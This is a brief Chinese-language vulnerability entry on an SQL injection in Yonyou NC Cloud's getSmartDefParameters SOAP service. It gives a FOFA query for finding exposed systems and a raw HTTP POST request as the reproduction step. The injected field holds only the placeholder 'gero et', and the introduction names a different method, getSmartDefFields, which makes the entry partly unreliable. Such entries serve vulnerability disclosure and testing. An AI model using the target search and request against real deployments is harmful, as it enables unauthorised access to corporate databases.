用友-NC-Cloud系统getSmartDefParameters存在SQL注入漏洞
一、漏洞简介
NC Cloud是用友推出的大型企业数字化平台。用友-NC-Cloud系统getSmartDefFields存在SQL注入漏洞。
二、影响版本
- 用友NC Cloud
三、资产测绘
- fofa
app="用友-NC-Cloud" - 登录页面
四、漏洞复现
POST /uapws/service/nc.itf.smart.ISmartQueryWebService HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=0228E626221732545F3EA3725D9F2EC9.ncMem02; JSESSIONID=66E4C3071500C21893E1DBD832D8B8C3.ncMem02
Upgrade-Insecure-Requests: 1
SOAPAction: urn:getSmartDefParameters
Content-Type: text/xml;charset=UTF-8
Host: xx.xx.xx.xx
Content-Length: 348
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ism="http://smart.itf.nc/ISmartQueryWebService">
<soapenv:Header/>
<soapenv:Body>
<ism:getSmartDefParameters>
<!--type: string-->
<ism:string>gero et</ism:string>
</ism:getSmartDefParameters>
</soapenv:Body>
</soapenv:Envelope>